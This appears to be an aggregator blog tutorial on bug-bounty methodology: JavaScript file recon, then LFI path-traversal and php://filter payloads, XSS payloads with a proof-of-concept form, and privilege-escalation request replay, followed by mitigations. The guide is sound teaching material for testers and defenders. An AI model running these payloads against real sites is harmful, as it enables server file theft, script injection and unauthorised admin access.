Unlock the Hidden Secrets in JS Files: A Pro Hacker’s Guide to Finding LFI, XSS, and Privilege Escalation

Listen to this Post

Featured Image

Introduction:

A recent LinkedIn post by security researcher Harsh Navgale revealed a stunning triple discovery—Local File Inclusion (LFI), Stored/Blind XSS, and Vertical Privilege Escalation—on a single asset. The key to this success? A meticulous analysis of JavaScript (JS) files, which often contain hidden paths, API endpoints, and logic flaws. This article provides a technical deep dive into replicating this methodology, transforming your recon process from passive observation to active exploitation.

Learning Objectives:

  • Master the techniques for systematically analyzing JavaScript files to uncover hidden endpoints and sensitive information.
  • Learn the commands and tools required to identify, exploit, and mitigate common vulnerabilities like LFI, XSS, and Broken Access Control.
  • Develop a professional-grade workflow for automating the discovery of critical web application security flaws.

You Should Know:

1. Automating JavaScript File Discovery and Analysis

The first step is to collect all JS files from a target domain. Manual browsing is inefficient; automation is key.

 Using subfinder, httpx, and waybackurls to gather endpoints
subfinder -d target.com -silent | httpx -silent | waybackurls | grep -E '.js$' > js_files.txt

Using a tool like getJS to automate collection
python3 getJS.py -u https://target.com

Using a bash one-liner with curl and grep to find JS files in page source
curl -s https://target.com | grep -Eo 'src="[^"]+.js"' | cut -d'"' -f2

Step-by-step guide: This methodology focuses on enumeration. The `subfinder` and `httpx` pipeline discovers subdomains and checks them for live HTTP services. `waybackurls` fetches historical URLs from the Wayback Machine, and the `grep` command filters for JavaScript files. The output is saved for analysis. `getJS` is a dedicated tool that parses HTML to find and download JS files. The simple `curl` one-liner can be used for a quick, targeted extraction of JS file paths from a specific page’s source code.

  1. Extracting Hidden Endpoints and API Calls from JS Files
    Once you have a list of JS files, the next step is to mine them for hidden treasures: endpoints, API keys, and paths.

    Using grep to find common patterns (endpoints, API paths, keywords)
    grep -n -E "(/api/|/admin/| endpoint|.php|.asp|.aspx|.jsp|https?://)" js_files.txt
    
    Using a tool like LinkFinder specifically designed for this task
    python3 LinkFinder.py -i https://target.com/example.js -o cli
    
    Extracting all strings for manual review
    strings external.js | grep -i api > potential_endpoints.txt
    

    Step-by-step guide: Static analysis of the JS code is crucial. The `grep` command searches for common patterns indicative of endpoints or API calls. `LinkFinder` is a more powerful tool that parses JS code, often uncovering obfuscated or complex endpoints missed by simple grepping. The `strings` command extracts all plaintext strings from the file, which can then be grepped for keywords like ‘api’, ‘admin’, or ‘token’, revealing hidden functionality.

3. Testing for Local File Inclusion (LFI) Vulnerabilities

LFI allows an attacker to read sensitive files on the server. Discovered file paths from JS analysis are perfect candidates for testing.

 Common LFI payloads to test on parameters
curl -s "https://target.com/page.php?file=../../../../etc/passwd"
curl -s "https://target.com/page.php?file=....//....//....//etc/passwd"  Path traversal bypass

Using a wordlist with ffuf to fuzz for LFI
ffuf -w lfi_wordlist.txt -u "https://target.com/page.php?file=FUZZ" -mr "root:"

Testing for PHP wrapper to read source code
curl -s "https://target.com/page.php?file=php://filter/convert.base64-encode/resource=index.php" | base64 -d

Step-by-step guide: LFI vulnerabilities are often found in parameters that take a file path. After identifying a potential parameter (e.g., ?file=main.js), test it with path traversal payloads to escape the web root and access system files like /etc/passwd. Use a fuzzer like `ffuf` with a dedicated LFI wordlist to automate testing. The `php://filter` wrapper can be used to read the base64-encoded source code of application files, which can then be decoded to find database credentials or other logic flaws.

4. Exploiting Stored and Blind Cross-Site Scripting (XSS)

JS files can reveal form endpoints or API calls that accept user input without proper sanitization, leading to XSS.

 Basic XSS payload to test input fields
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>

Testing for DOM XSS by analyzing JS file sinks
 Look for patterns like innerHTML, document.write, eval()
grep -n "innerHTML|document.write|eval(" analyzed_script.js

Using a tool like XSStrike to automate testing
python3 xsstrike.py -u "https://target.com/search?q=query"

Step-by-step guide: Stored XSS occurs when malicious input is saved by the server and displayed to other users. Blind XSS is stored XSS where the payload triggers on a different page or admin panel. After finding a form or API endpoint from your JS analysis, submit standard XSS payloads. For DOM-based XSS, analyze the JS files to find “sinks” (like innerHTML) that write user-controllable data to the page. Automated tools like XSStrike can help bypass weak filters.

  1. Identifying and Exploiting Broken Access Control (Privilege Escalation)
    JS files may contain API routes or function calls that are not properly protected by authorization checks on the backend.

    Analyzing JS for API routes that might be vulnerable
    grep -n "/api/admin/deleteUser|/api/user/changePassword" .js
    
    Testing for Vertical Privilege Escalation (BAC)
    
    <ol>
    <li>Log in as a low-privilege user (userA)</li>
    <li>Capture a request from an admin-only function (e.g., GET /api/admin/users)</li>
    <li>Replay the request using userA's session token to see if the endpoint is protected
    curl -H "Cookie: session=userA_session_cookie" https://target.com/api/admin/users</li>
    </ol>
    
    Using Burp Suite to easily replay and modify requests
    

    Step-by-step guide: Broken Access Control (BAC) is a critical flaw where users can perform actions outside their intended permissions. The JS analysis might reveal an admin API endpoint like /api/admin/exportData. If this endpoint is only checked for authorization on the client side (in the JS), a low-privileged user can often replay the request directly to the server to execute the admin function. This is a classic Vertical Privilege Escalation. Always test every discovered endpoint with different user roles.

6. Validating Findings and Proof-of-Concept Creation

A professional bug bounty report requires a clear, reproducible Proof-of-Concept (PoC).

 Using curl to create a PoC for an LFI vulnerability
echo -e "\n[LFI PoC]"
echo "curl -i 'https://target.com/includes/load.php?file=....//....//etc/passwd'"
echo -e "Response Contains: root:x:0:0:root:/root:/bin/bash\n"

Creating a simple HTML PoC for a Blind XSS payload
cat > xss_poc.html << EOF
<html>
<body>

<form action="https://target.com/api/comment" method="POST">
<input type="hidden" name="comment" value="<img src=x onerror=alert(document.domain)>">
<input type="submit" value="Submit PoC">
</form>

</body>
</html>
EOF

Step-by-step guide: For LFI, your PoC is a simple command showing the retrieval of a sensitive file. For XSS, a hosted HTML file that automatically submits the payload is often the clearest way to demonstrate the issue to a security team. For BAC, provide the exact `curl` command or Burp Suite request that a low-privileged user can run to successfully access an admin function. Clarity and reproducibility are paramount.

7. Mitigation and Hardening Strategies

Understanding the漏洞 is only half the battle; knowing how to fix them is what makes you a complete security professional.

 Apache server mitigation for LFI (edit httpd.conf)
<Directory />
AllowOverride None
Require all denied
</Directory>

Example Node.js/Express sanitization for XSS
const striptags = require('striptags');
let userInput = striptags(maliciousInput); // Sanitizes HTML tags

Code-level mitigation for Broken Access Control (Pseudocode)
function deleteUser(req, res) {
if (req.user.role !== 'admin') { // Always check on the server-side
return res.status(403).send('Forbidden');
}
// ... proceed with delete logic
}

Step-by-step guide: Mitigations must be implemented on the server-side. For LFI, avoid passing user input directly to file system APIs. Use an allowlist of permitted files. For XSS, contextually output encode all user-controlled data. Use Content Security Policy (CSP) headers as an additional layer of defense. For Broken Access Control, every single API endpoint must enforce authorization checks based on the user’s session and role, never relying on client-side checks.

What Undercode Say:

  • Recon is King: The initial discovery phase, particularly the analysis of JavaScript files, is the most critical step in modern web application hacking. It reveals the hidden attack surface that automated scanners often miss.
  • The Client-Side is a Lie: Never trust client-side enforcement. JS files may hide admin endpoints or contain client-side access checks, but the server must validate every request independently. This disconnect is the root cause of many severe vulnerabilities.

The techniques demonstrated here, inspired by a real-world bug bounty success, highlight a systematic shift in application security. The most critical vulnerabilities are no longer just in the main application logic but are hidden within the supporting client-side code. This approach of deep JavaScript analysis is becoming a fundamental and non-negotiable skill for pentesters and bug bounty hunters, moving beyond basic automated scanning to a more nuanced, code-aware reconnaissance process. The organizations that fail to sanitize their client-side code and enforce strict server-side authorization will continue to be low-hanging fruit for skilled researchers.

Prediction:

The practice of hiding API endpoints and application logic within obfuscated JavaScript will intensify, leading to a new class of “client-side” vulnerabilities. This will simultaneously drive the development of more advanced static analysis tools for attackers and deeper integration of security-focused code reviews in the Software Development Lifecycle (SDLC) for defenders. We will also see a rise in vulnerabilities related to third-party scripts and supply chain attacks via compromised JS libraries, making Subresource Integrity (SRI) tags a critical defense mechanism.

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Harsh2505 Bugbounty – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky